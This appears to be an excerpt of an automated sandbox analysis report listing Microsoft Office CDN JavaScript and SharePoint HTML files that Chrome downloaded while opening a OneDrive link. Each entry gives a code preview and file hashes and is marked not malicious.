                              URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-04-19.005/odblightspeedwebpack/594.js
                              Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[594],{2205:function(e,t,n){n.d(t,{b:function(){return d}});var a=n("tslib_102"),i=n(23),r=n("odsp.util_578"),o=n(2088),s=n(242),c=function(e){function t(t,n){void 0===n&&(n={});var a=e.call(this,t,n)||this;return a._getModule=t.getModule,a._path=t.path,a._getExecutorParams=t.getExecutorParams,r.HW.isActivated("9DB5106C-820A-4714-B0C1-1005523DFE8F","07/09/2021","Removes usage of BundeLoader from ExecutorAction to solve race conditions in BundleQueue")&&(a._bundleLoader=a.resources.consume(s.a),a._bundleLoader.queueLoad(a._path,a._getModule).done()),a}return(0,a.XJ)(t,e),t.prototype.execute=function(e,t){var n=this;return this._path?this._loadExecutorType().then(function(a){return"function"!=typeof a?i.c.wrapError(new Error("Cannot create action from ".concat(a,": ").concat(n._path))):i.c.as(n._getExecutorParams()).then(function(r){var o=new(n.resources.injected(a))(r);return i.c.as(o.execute(e,t))})}):i.c.wrap
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:ASCII text, with very long lines (22599)
                              Category:downloaded
                              Size (bytes):249264
                              Entropy (8bit):5.300269154437789
                              Encrypted:false
                              SSDEEP:
                              MD5:518E5AB884F3DA730F86AD8A3FD3B02B
                              SHA1:FEBFCFD6EC1CEA7094E6C0BCA9DC6D46BB895428
                              SHA-256:D3F9651B273C717799FAE7235445F2BD6CCA328EDC781F441CF387E0B03AC1E7
                              SHA-512:B157FA7BF73B0E4218095340E68F8C39B59851A33C82E4111750BFC4A1D572E4740DAAEE58C8CA0BFF55A1DCABBE72581EF7E4EEA61E3CDFA00F4E6A8BF97D47
                              Malicious:false
                              Reputation:unknown
                              URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-04-19.005/listsenterprise/12.js
                              Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[12],{2272:(e,t,n)=>{n.d(t,{a:()=>o});var a=n("tslib_102"),i=n(476),r=n(1696),o=function(e){function t(t,n){var a=e.call(this,{},n)||this;return a._pageContext=n.pageContext,a._getOAuthToken=t.getOAuthToken,a._microServiceEndPointDataSource=new r.a(a._pageContext),a}return(0,a.XJ)(t,e),t.prototype.getCopilotItems=function(e,t,n){return(0,a.Zd)(this,void 0,void 0,function(){var i,r,o,s=this;return(0,a.qr)(this,function(a){switch(a.label){case 0:return i="".concat(e,"/_api/").concat("v2.0","/drives/").concat(t),[4,this.getDriveItems(i,n)];case 1:return r=a.sent(),o=[],r.forEach(function(e){e.file&&o.push({displayName:e.name,driveItemUrl:"".concat(i,"/items/").concat(e.id),extension:s.getExtension(e.name)})}),[2,o]}})})},t.prototype.getExtension=function(e){var t="",n=e.lastIndexOf(".");return n>-1&&(t=e.substring(n)),t.startsWith(".")&&t.length>1&&(t=t.substring(1)),t},t.prototype.getDriveItems=function(e,t){ret
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:ASCII text, with very long lines (4596)
                              Category:downloaded
                              Size (bytes):4601
                              Entropy (8bit):5.206790636367654
                              Encrypted:false
                              SSDEEP:
                              MD5:D2851EC8AEA46DAB016F76F07D07E568
                              SHA1:E6B4C8C013ABBE58C986E39E8557DBA68EC35D7B
                              SHA-256:44AA0007104D2E86753C4FC75FB1AC805EE7DF066CDF3E0A5DE2F28A38699ADD
                              SHA-512:35B8C9246D0C51045735A275015D76D71FCF0C307915F25B0CCB5C4EA27C5912C44D20D59952386D0B9E26C5F8261CD6C765EB6AFB42723644FF4D930CE3086F
                              Malicious:false
                              Reputation:unknown
                              URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-04-19.005/@ms/stream-bundle/chunks/streamWebApp.js
                              Preview:"use strict";(self.webpackChunk_ms_stream_bundle=self.webpackChunk_ms_stream_bundle||[]).push([[91752],{447899:(e,t,n)=>{n.r(t),n.d(t,{createStreamWebApp:()=>_,loadMtcManager:()=>f.s,onePlayerVersion:()=>l._,prefetchManifest:()=>p.g,prefetchManifestLite:()=>p.H,prewarmResources:()=>u.G,stringToMediaVisibility:()=>m.r});var a=n(295610),i=n(82999),r=n(782849),o=n(265889),s=function(e){function t(t,n){var a=e.call(this,t)||this;return a.getStreamWebAppPlugins=n,a.isHelpPluginInSWAEnabled=!!a.featureConfiguration.settings.getSetting("isHelpPluginInSWAEnabled","boolean"),a.isNavPanelReflowEarlyFixEnabled=a.featureConfiguration.settings.getSetting("isNavPanelReflowEarlyFixEnabled","boolean"),a.onResize=function(){var e;a.navigationButtonStyle.value=c(a.isNavPanelReflowEarlyFixEnabled?!!(null===(e=a.options.hostPluginUiOptions)||void 0===e?void 0:e.isSidePanelEnabled):void 0!==a.options.hostPluginUiOptions),a.updateNavigationContainerStyle()},a.updateNavigationContainerStyle=function(){a.navi
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:ASCII text, with very long lines (2014)
                              Category:downloaded
                              Size (bytes):2019
                              Entropy (8bit):5.397536247243558
                              Encrypted:false
                              SSDEEP:
                              MD5:51AEA6A9A6676BE9AFCB7A2A5CFFCAD2
                              SHA1:3E299D7B7700EC2205191498EE25822F786C3B77
                              SHA-256:2DA263DE84E3586F3978C556B14E8E4D83014313484FEFAA83D71BDB8BEC6A8C
                              SHA-512:DDCC7EDDB46CBA2839B3D33A8FA8B09EECA1F7DE4512F477EDE00EB6DBFFFF8B57BBCE3FBB07EC07F951489D2D0F26B8594F46F5FD526A43E500564ED3FF9530
                              Malicious:false
                              Reputation:unknown
                              URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-04-19.005/listsenterprise/167.js
                              Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[167],{1993:(e,t,n)=>{n.r(t),n.d(t,{BucketHeaderEditor:()=>u});var a=n("tslib_102"),i=n(1),r=n(0),o=n(2303);(0,n("fui.util_150").pZ)([{rawString:".bucketEditorContainer_7089a8fb{display:flex;justify-content:center;margin-bottom:-8px}.bucketEditorContainer_7089a8fb .formOpen_7089a8fb{margin:8px 14px 9px 14px;border-radius:4px;width:100%;position:relative}.bucketEditorContainer_7089a8fb .textField_7089a8fb{flex:1}.bucketEditorContainer_7089a8fb .spinner_7089a8fb{position:absolute;right:6px;top:6px}"}]);var s=n(34),c=n(2290),d=(0,s.b)({loader:function(e){return e.TextField}}),l=(0,s.b)({loader:function(e){return e.Spinner}}),u=function(e){var t=e.bucketID,n=void 0===t?"":t,u=e.editorMode,f=e.saveCallback,p=e.cancelCallback,m=(0,r.i)(n),_=m[0],h=m[1],b=(0,r.i)(!1),g=b[0],v=b[1],y=(0,r.h)(null);(0,r.c)(function(){y.current&&y.current.select()},[]);var S=function(){return(0,a.Zd)(void 0,void 0,void 0,function(){var
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:Unicode text, UTF-8 text, with very long lines (6120)
                              Category:downloaded
                              Size (bytes):8008
                              Entropy (8bit):5.316352211292196
                              Encrypted:false
                              SSDEEP:
                              MD5:817BC118D1B49A56E888FABAD8F4CFBE
                              SHA1:3F9B3DF259F72C782E235891774CF9AA40F78BE0
                              SHA-256:5073C14CD17933FB01B82BB9E8850FC80667E61532FC56AA11383D59CAD62C8D
                              SHA-512:0251AAC854A006204A2BC86C22FF7B76D37F2D6C0FCC26576FD4229EEA2E193879B15CA53962492B67A34CE058A9325BBD9FB7B21C890E18E0210963B1674227
                              Malicious:false
                              Reputation:unknown
                              URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-04-19.005/odblightspeedwebpack/11.js
                              Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[11,909],{6353:function(e,t,n){n.d(t,{a:function(){return o},b:function(){return r},c:function(){return s},d:function(){return d},e:function(){return l},f:function(){return p},g:function(){return f},h:function(){return c}});var a=n("odsp.util_578"),i=n(6352),r="_ComplianceTag",o="_ComplianceFlags",s=200;function c(e){return!!(256&e)}function d(e){if(!e.HasRetentionAction)return".";if(0===e.TagDuration)return e.BlockDelete?i.RetainForeverText:".";var t=u(e.TagDuration);return e.BlockDelete?a.OO(i.PreserveTagText,t):e.AutoDelete?a.OO(i.DeleteTagText,t):"."}function l(e){if(e.Notes)return e.Notes;if(!e.HasRetentionAction)return i.NoRetentionTooltip;if(0===e.TagDuration)return e.BlockDelete?i.PreserveForeverTooltip:i.NoRetentionTooltip;var t=u(e.TagDuration),n="",r="";e.BlockDelete?(n="PreserveTag"+e.TagRetentionBasedOn+"Tooltip",e.BlockEdit&&(r=i.PreserveIsRecordTooltipModifier),e.ReviewerEmail?r+=i.ReviewTool
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:ASCII text, with very long lines (2021)
                              Category:downloaded
                              Size (bytes):5292
                              Entropy (8bit):5.226330975185165
                              Encrypted:false
                              SSDEEP:
                              MD5:DD932AE06F365A0144C5BA4D3BDB7BB5
                              SHA1:812618793C6D20AB929C7E08D18F79E1641F4C44
                              SHA-256:31DE5D39A3CECA5DA93C90D81B45D63866EF6D6B01261AEF4BE0C03CE01DFB4C
                              SHA-512:0F0518762221150128C43E08DF63880A2D0B6E1E3FF1842BDFEE7F70475CF74D3DE83ABEEF59096A4B67E21006BFA16918B700A4B23D6C21B70DF033AA92E83B
                              Malicious:false
                              Reputation:unknown
                              URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-04-19.005/odblightspeedwebpack/539.js
                              Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[539],{4024:function(e,t,n){n.d(t,{a:function(){return o}});var a=n(718),i=n(220),r=n(20);function o(e,t,n){return!(e.type===i.b.OneNote||e.list||e.subsite||(n||!e.urls[a.a.downloadAsZip]||!e.urls[a.a.itemUrl]||0===e.childCount||e.type!==i.b.Folder)&&(e.isRootFolder||!t||t&&t.list&&t.list.templateType===r.c.webPageLibrary||e.type!==i.b.File&&e.type!==i.b.Media&&e.type!==i.b.Unknown))}}.,2205:function(e,t,n){n.d(t,{b:function(){return d}});var a=n("tslib_102"),i=n(23),r=n("odsp.util_578"),o=n(2088),s=n(242),c=function(e){function t(t,n){void 0===n&&(n={});var a=e.call(this,t,n)||this;return a._getModule=t.getModule,a._path=t.path,a._getExecutorParams=t.getExecutorParams,r.HW.isActivated("9DB5106C-820A-4714-B0C1-1005523DFE8F","07/09/2021","Removes usage of BundeLoader from ExecutorAction to solve race conditions in BundleQueue")&&(a._bundleLoader=a.resources.consume(s.a),a._bundleLoader.queueLoad(a._path,a._getM
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:HTML document, ASCII text, with very long lines (56863), with CRLF line terminators
                              Category:downloaded
                              Size (bytes):271082
                              Entropy (8bit):5.93293814523654
                              Encrypted:false
                              SSDEEP:
                              MD5:09490A07E342422E9186409F4EC2EF91
                              SHA1:CC56A06575991A68AC8353F111506EEABFBFF442
                              SHA-256:6D88396B009C6387D83BB5A1F5FF2D3F3B9689CAB2F6416C0E38125B4F5CC495
                              SHA-512:C0F7FB95AA8D5C669A6314962D0023C85239EF4250349FF6EB2FD56DD1D804A74DE5B01503D033C071595D000BF8E50A53C56531C662AB0EC8A4460B6D5D55C5
                              Malicious:false
                              Reputation:unknown
                              URL:https://netorgft3648903-my.sharepoint.com/personal/samantha_ever-eden_com/_layouts/15/onedrive.aspx?id=%2Fpersonal%2Fsamantha%5Fever%2Deden%5Fcom%2FDocuments%2FDocuments%2FOffice%20Scripts%2Fdoc%2DHR%2Epng&parent=%2Fpersonal%2Fsamantha%5Fever%2Deden%5Fcom%2FDocuments%2FDocuments%2FOffice%20Scripts&ga=1
                              Preview:..<!DOCTYPE html>..<html lang="en-us" dir="ltr">..<head><meta name="GENERATOR" content="Microsoft SharePoint" /><meta http-equiv="Content-type" content="text/html; charset=utf-8" /><meta http-equiv="X-UA-Compatible" content="IE=edge" /><meta http-equiv="Expires" content="0" /><meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, minimum-scale=1.0, user-scalable=no" /><title>...OneDrive..</title><link rel="shortcut icon" href="/_layouts/15/images/odbfavicon.ico?rev=47" type="image/vnd.microsoft.icon" id="favicon" /></head>.. <body style="margin: 0; padding: 0;">.. <script nonce= 'be41aa47-3605-40f3-93c0-6a1cfb3dc49a' >if(!spfxPerfMarks){var spfxPerfMarks = {};} var markPerfStage=function(key) {if(window.performance && typeof window.performance.now === 'function'){spfxPerfMarks[key]=window.performance.now();} else{spfxPerfMarks[key]=Date.now();} if (window.performance && typeof window.performance.mark === 'function') {window.performance.mark(key);}};<
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:ASCII text, with very long lines (5517)
                              Category:downloaded
                              Size (bytes):5667
                              Entropy (8bit):5.428486608662199
                              Encrypted:false
                              SSDEEP:
                              MD5:0DDC42210580606DFCC247714CCF83CB
                              SHA1:398285969A06A561DAFD6949A25755FF1A8BBEFF
                              SHA-256:59E528DEDA67C595CE65E228BC69B31BBAF34A041C3A92F9CC5169A240234800
                              SHA-512:627567BB530BD684C01E2F8B2BD06527CB6EE63CE36038B1722730FA8952B78C3EA03EAD43387BF962CDC106BE0F92FAC5F86CB83641D3A5E107BC941BB45C47
                              Malicious:false
                              Reputation:unknown
                              URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-04-19.005/listsenterprise/242.js
                              Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[242],{2e3:(e,t,n)=>{n.r(t),n.d(t,{AddColumn:()=>u});var a=n("tslib_102"),i=n("react-lib"),r=n("fui.lco_35"),o=n("fui.lcoms_307"),s=n("fui.util_150");(0,s.pZ)([{rawString:".contentContainer_b322847d{display:flex;flex-direction:row;height:300px;border-bottom:1px "},{theme:"neutralQuaternaryAlt",defaultValue:"#e1dfdd"},{rawString:" solid}.addColumnCallout_b322847d{width:557px}.columnTypesContainer_b322847d{padding:20px;width:218px;flex-direction:column;overflow-y:scroll;overflow-x:hidden}.descriptionSectionRoot_b322847d{width:329px;background-color:"},{theme:"neutralLighterAlt",defaultValue:"#faf9f8"},{rawString:";padding:20px;display:flex;flex-direction:column;text-align:center}.descriptionSection_b322847d{display:flex;flex-direction:column;height:220px;justify-content:center;align-items:center}.columnImage_b322847d{max-width:180px;max-height:100px}.descriptionText_b322847d{font-size:12px;max-width:334px;paddin
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:ASCII text, with very long lines (4721)
                              Category:downloaded
                              Size (bytes):4726
                              Entropy (8bit):5.253071761328005
                              Encrypted:false
                              SSDEEP:
                              MD5:BC465B4FF02EF4C12378E9126D0D395C
                              SHA1:17979B8C0E242E21B16212B036C05E8D8FE039EC
                              SHA-256:AF0DA943578D40704C20C94960287EC812AB5E4C323E550D5B1FC63C702C025D
                              SHA-512:2F57E8EEBF4F2BF3A62E61B1EAE88E7A51E35DA2C81CDF435910C6DE73AB3F8F6303286CC5879133E7B3922E1E9F250C89B6EB39E61E2269CE80E1614A83DFAA
                              Malicious:false
                              Reputation:unknown
                              URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-04-19.005/@ms/stream-bundle/chunks/27760.js
                              Preview:"use strict";(self.webpackChunk_ms_stream_bundle=self.webpackChunk_ms_stream_bundle||[]).push([[27760],{127760:(e,t,n)=>{n.d(t,{h5:()=>y});const a=["Top","Right","Bottom","Left"];function i(e,t,...n){const[i,r=i,o=i,s=r]=n,c=[i,r,o,s],d={};for(let n=0;n<c.length;n+=1)(c[n]||0===c[n])&&(d[e+a[n]+t]=c[n]);return d}function r(...e){return i("border","Width",...e)}function o(...e){return i("border","Style",...e)}function s(...e){return i("border","Color",...e)}const c=["none","hidden","dotted","dashed","solid","double","groove","ridge","inset","outset"];function d(e){return c.includes(e)}const l=e=>"number"==typeof e&&!Number.isNaN(e),u=e=>"auto"===e,f=["content","fit-content","max-content","min-content"],p=e=>f.some(t=>e===t)||(e=>"string"==typeof e&&/(\d+(\w+|%))/.test(e))(e),m=/var\(.*\)/gi,_=/^[a-zA-Z0-9\-_\\#;]+$/,h=/^-moz-initial$|^auto$|^initial$|^inherit$|^revert$|^unset$|^span \d+$|\d.*/;function b(e){return void 0!==e&&"string"==typeof e&&_.test(e)&&!h.test(e)}const g=["-moz-init
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:ASCII text, with very long lines (691)
                              Category:downloaded
                              Size (bytes):973
                              Entropy (8bit):5.050758854362429
                              Encrypted:false
                              SSDEEP:
                              MD5:25AEF2EE3EFD7EC502B327386DE12EF4
                              SHA1:7ECBD143BCB81A371025443A2305BF97911C3A1A
                              SHA-256:B0449A89A9C4EE81F94EF973116A8DA9F3E3261DBCE270D96EE663610E3A35C6
                              SHA-512:59D3EBF2E5AD0674F47D63D0B56261200ED3B50DAFC6C5B310ECCF639BB47D049D6067AF49EF466E7E2A64616116742130C07249970EEABC2D1F93C8D070D44D
                              Malicious:false
                              Reputation:unknown
                              URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-04-19.005/freemiumlistshomewebpack/en-gb/deferred.resx.js
                              Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([["deferred.resx"],{393:e=>{e.exports=JSON.parse('{"a":"Provide feedback to Microsoft"}')}.,315:e=>{e.exports=JSON.parse('{"a":"My files"}')}.,386:e=>{e.exports=JSON.parse('{"a":"Library settings"}')}.,387:e=>{e.exports=JSON.parse('{"a":"Add an app","b":"Brand centre (preview)","c":"Brand centre","d":"Change the look","j":"Library settings","k":"List settings","r":"Site usage","s":"Site contents","w":"Site settings","u":"Site permissions","t":"Site information","i":"Hub site settings","m":"Recycle Bin","p":"What\\u0027s new","q":"Sign out","h":"Help","v":"Site designs","f":"Global navigation","x":"Apply a site template","l":"OneDrive settings","o":"Restore your OneDrive","g":"Connect to new Microsoft 365 Group","n":"Restore this library","B":"Manage Viva Connections","A":"Set up Viva Connections (Preview)","e":"Get the OneDrive apps","z":"Sync this OneDrive","y":"Video usage"}')}.}]);
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:ASCII text, with very long lines (16997)
                              Category:downloaded
                              Size (bytes):73613
                              Entropy (8bit):5.3913462395102
                              Encrypted:false
                              SSDEEP:
                              MD5:41EFD83BF4B1F2D8D06E7E570AA84C87
                              SHA1:985893C2EB916A94100A0825C16E16B6B8C2B0C6
                              SHA-256:14A7485CE8F1C359AF0611DB71A42EB82E02C0135B83C93B3D72036C19569290
                              SHA-512:8BC7FEC64406C288425173FA268F261E970EDBD4389801CC2E9ABDA9909256998CE045934D8373878ADEEFB9BE9F94F47ED69A633A4E718F18989EC87CD9B98A
                              Malicious:false
                              Reputation:unknown
                              URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-04-19.005/odblightspeedwebpack/43.js
                              Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[43,979],{4497:function(e,t,n){n.d(t,{a:function(){return d}});var a=n("tslib_102"),i=n(27),r=n(79),o=n(80),s=n(229),c=n(3696),d=(0,i.b)(function(){return function(e){return(0,a.Zd)(void 0,void 0,void 0,function(){return(0,a.qr)(this,function(t){return e((0,r.b)(s.b,o.a)(c.b)),e((0,r.b)(s.a,o.a)(c.b)),[2]})})}})}.,4493:function(e,t,n){n.d(t,{a:function(){return d}});var a=n("tslib_102"),i=n(56),r=n(27),o=n(275),s=n(179);function c(e,t){var n=t.currentItemKey,a=e.demandItemFacet(s.a,n);return a?{currentItemKey:a.remoteItemKey}:{}}var d=(0,r.b)(function(){return function(e){return(0,a.Zd)(void 0,void 0,void 0,function(){return(0,a.qr)(this,function(t){return e((0,i.b)(s.a,o.a)(c)),[2]})})}})}.,3696:function(e,t,n){n.d(t,{a:function(){return D},b:function(){return S}});var a=n("tslib_102"),i=n(27),r=n(109),o=n(2837),s=n(737),c=n(4498),d=n(3030),l=n(229),u=n(302),f=n(1301),p=n(184),m=n(67),_=n(272),h=n(14),b=n(679
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:ASCII text, with very long lines (863)
                              Category:downloaded
                              Size (bytes):868
                              Entropy (8bit):5.17134632816781
                              Encrypted:false
                              SSDEEP:
                              MD5:593B1E2DBA133A1C13ED9A54E90A903B
                              SHA1:D7606D326FD72467214757C9A052989757A1A0C5
                              SHA-256:6205F1295A30547B98810CBE3653C92E7B728275CF3EAA962F827ACB6A0903DD
                              SHA-512:1A086C9D295C6B427611DA5263A3FE8BB2D56A20A059A295EDB0D87846EDDBDC41354BBCA38BA874DFC8C2C0D8721F3DE65FBEA75CE9883110E98BB61B569309
                              Malicious:false
                              Reputation:unknown
                              URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-04-19.005/listsenterprise/47.js
                              Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[47],{730:(e,t,n)=>{n.r(t),n.d(t,{removeSelectedColumnStyles:()=>l,removeSelectionAffordances:()=>c,setSelectedColumnStyles:()=>d,setupSelectionAffordances:()=>s});var a=n(3),i=n(12),r=n(20),o=n(220);function s(e,t,n,a,r,s){if(e.setGridPosition(t),2===t.colEnd||e.setVisibility(!0),n||e.toggleCssClass(o.d,!0),!r){var c=t.rowStart<=1,l=2===t.colEnd,u=!(0,i.b)()&&s;!c&&!l&&!u&&d(a,t.colStart,t.colEnd)}}function c(e,t,n){e.setVisibility(!1),e.toggleCssClass(o.d,!1),n||l(t)}function d(e,t,n){if(n-=2,(t-=1)<0&&(t=0),r.y){var i=(0,a.A)(e);if(i)for(var s=t,c=i.children[t];s<=n&&c;)c.classList.add(o.e),s++,c=(0,r.w)(c)}else for(var d=(0,r.i)(e)||[],l=t;l<=n;l++)d[l].classList.add(o.e)}function l(e){var t=(0,a.A)(e);if(t)for(var n=t.children[0];n;)n.classList.remove(o.e),n=(0,r.w)(n)}}.}]);
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:ASCII text, with very long lines (49570)
                              Category:downloaded
                              Size (bytes):104793
                              Entropy (8bit):5.213062065582695
                              Encrypted:false
                              SSDEEP:
                              MD5:066D86A0A4393497157DB731ABA9FC98
                              SHA1:7514E1D45C1620789F300BC7880A7989BBAFB451
                              SHA-256:507F3372DB8E127936A4E5ADFA2FCDE5F195D12D022A65DDC6679F060902E1B6
                              SHA-512:C0A28FD469D4D98347DDA93E4E1B0A71F764314216C52177C313BEF2362208727BCC18B94E6A9C5D7C24D1D1B84583C9941349B50C54732E3DFE38960F243087
                              Malicious:false
                              Reputation:unknown
                              URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-04-19.005/listsenterprise/177.js
                              Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[177],{900:(e,t,n)=>{n.d(t,{a:()=>i});var a=n(842);function i(e){return(0,a.a)(e())}}.,893:(e,t,n)=>{n.d(t,{a:()=>c,b:()=>s});var a=n(830),i=n(324),r=n(829),o=new a.a("operation",{operationTypeId:i.b,keyFacetId:i.b});function s(e){var t=e.operationTypeFacet,n=e.keyFacet;return o.serialize({operationTypeId:t.id,keyFacetId:n.id})}function c(e){var t=o.deserialize(e),n=t.keyFacetId,a=t.operationTypeId;return{keyFacet:r.a.get(n),operationTypeFacet:r.a.get(a)}}}.,894:(e,t,n)=>{n.d(t,{a:()=>l,b:()=>d,c:()=>c});var a=n("tslib_102"),i=n(829),r=n(893),o=n("odsp.util_578"),s=n(895),c=new i.a("noRegisteredHandlerError");function d(e){var t=e.operationTypeFacet,n=e.keyFacet;return new s.a({message:"There is no operation handler registered for operation type '".concat(t.id,"' of key facet '").concat(n.id,"'."),isExpected:!0,facets:(0,a.W_)({},c.pack((0,r.b)({operationTypeFacet:t,keyFacet:n})))})}var l=function(e){function
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:ASCII text, with very long lines (45377)
                              Category:downloaded
                              Size (bytes):45407
                              Entropy (8bit):5.399175274223932
                              Encrypted:false
                              SSDEEP:
                              MD5:A726C18CB593E7E5C71022AD9C8CD693
                              SHA1:AC8CC2FF327B94E0A23A8E43D0AC8B6D2EAD0AC1
                              SHA-256:79C6ED180F4C140F1F15F43C9E2F95C443B28F3DF84159038F962B05B83E1284
                              SHA-512:129304F8441733DE749BAE6098F2C868651F2839C9370F580E1FB6037E53731264971F794CF01F4D0E78EF4E9DD950AAF0DEDF5642EC341ECDE6B9DF1B833406
                              Malicious:false
                              Reputation:unknown
                              URL:https://res-1.cdn.office.net/files/sp-client/odsp.fluentui.utilities/fui.util-011d660c.js
                              Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([["fui.util"],{"fui.util_150":(e,t,n)=>{n.d(t,{YY:()=>Gt,F2:()=>lt,up:()=>S,r5:()=>we,DG:()=>v,H3:()=>Fe,nO:()=>b,k_:()=>zt,YI:()=>g,xQ:()=>bn,AZ:()=>J,xY:()=>X,Aq:()=>Ne,Xh:()=>l,VO:()=>d,Jx:()=>Z,CW:()=>w,ny:()=>Y,Z3:()=>Q,w9:()=>p,cI:()=>k,HQ:()=>kt,TA:()=>ce,hx:()=>Rt,Df:()=>_e,wB:()=>xt,t3:()=>vt,te:()=>yt,dy:()=>me,bQ:()=>wn,sN:()=>He,N0:()=>hn,i3:()=>Ot,_x:()=>ln,it:()=>Yt,tw:()=>Jt,p9:()=>Ge,cc:()=>Nt,mB:()=>Qt,so:()=>St,hl:()=>pn,wT:()=>tn,Pq:()=>le,ih:()=>he,S9:()=>_n,K4:()=>h,fj:()=>Xt,vM:()=>$t,lM:()=>mn,wZ:()=>rt,PV:()=>$e,CS:()=>ye,o3:()=>De,N6:()=>Ce,gp:()=>Zt,_z:()=>en,yi:()=>an,DU:()=>qt,Yq:()=>nn,z3:()=>I,eH:()=>Te,V9:()=>x,Dn:()=>Pt,bP:()=>T,wc:()=>Wt,T7:()=>ve,ry:()=>f,MV:()=>Mt,xK:()=>dn,_q:()=>cn,__:()=>sn,xE:()=>on,Gw:()=>rn,Q8:()=>Kt,gj:()=>P,pZ:()=>gt,Mt:()=>Ft,aM:()=>It,Zx:()=>Pe,RH:()=>Bt,e1:()=>On,n8:()=>Cn,cT:()=>We,Pl:()=>Ke,dN:()=>Ue,NN:()=>ke,fV:()=>Vt,FB:()=>H,TG:()=>B,fZ:()=>Le
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:ASCII text, with very long lines (22435)
                              Category:downloaded
                              Size (bytes):106305
                              Entropy (8bit):5.434320133438619
                              Encrypted:false
                              SSDEEP:
                              MD5:C89BB6122CB1D89B8C2F0C28B5A1D3AB
                              SHA1:487207A7BC8A607367C83FEF4415540FC5EEC725
                              SHA-256:738AD1D77D5E95840ED4359BD35AABD44F486C5C2DCAF9E72437A02178BBD72E
                              SHA-512:5DAA6E7D784DBAEE9D4D0ADCB4A7057664767C187370ADA61B14D52228CE526479B1A79475BC0ACE676D31646E990E57A2D46B77D7769936DF9387F68A889357
                              Malicious:false
                              Reputation:unknown
                              URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-04-19.005/@ms/stream-bundle/chunks/35143.js
                              Preview:/*! For license information please see 35143.js.LICENSE.txt */."use strict";(self.webpackChunk_ms_stream_bundle=self.webpackChunk_ms_stream_bundle||[]).push([[35143],{374254:(e,t,n)=>{n.d(t,{Q:()=>r});var a=n(230985),i=n(161816);function r(e,t){const{disabled:n,disabledFocusable:r=!1,"aria-disabled":o,onClick:s,onKeyDown:c,onKeyUp:d,...l}=null!=t?t:{},u="string"==typeof o?"true"===o:o,f=n||r||u,p=(0,i.$)(e=>{f?(e.preventDefault(),e.stopPropagation()):null==s||s(e)}),m=(0,i.$)(e=>{if(null==c||c(e),e.isDefaultPrevented())return;const t=e.key;if(f&&(t===a.Ee2||t===a.KaI))return e.preventDefault(),void e.stopPropagation();t!==a.KaI?t===a.Ee2&&(e.preventDefault(),e.currentTarget.click()):e.preventDefault()}),_=(0,i.$)(e=>{if(null==d||d(e),e.isDefaultPrevented())return;const t=e.key;if(f&&(t===a.Ee2||t===a.KaI))return e.preventDefault(),void e.stopPropagation();t===a.KaI&&(e.preventDefault(),e.currentTarget.click())});if("button"===e||void 0===e)return{...l,disabled:n&&!r,"aria-disabled":!!r
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:Unicode text, UTF-8 text, with very long lines (6696)
                              Category:downloaded
                              Size (bytes):701362
                              Entropy (8bit):5.680082446817499
                              Encrypted:false
                              SSDEEP:
                              MD5:A28DB7667422E68D057E06C65D03B699
                              SHA1:67B631C44F9563C3440A2008DCAD23987336C665
                              SHA-256:A6F06FB61C8167A82C8AE78F0426B85EFED94B2E76C0CFD89E06F92395082000
                              SHA-512:207EF66CC9F41009E0E744B6E39F5C1683A6E86CAE132E9A5A41C6BD457959985C955E6227795B22BF865F682AFA5CB8B2A908215DA11B81B9A167FC92BD25EC
                              Malicious:false
                              Reputation:unknown
                              URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-04-19.005/file-browser-spo-teams-lists/ja/ondemand.resx.js
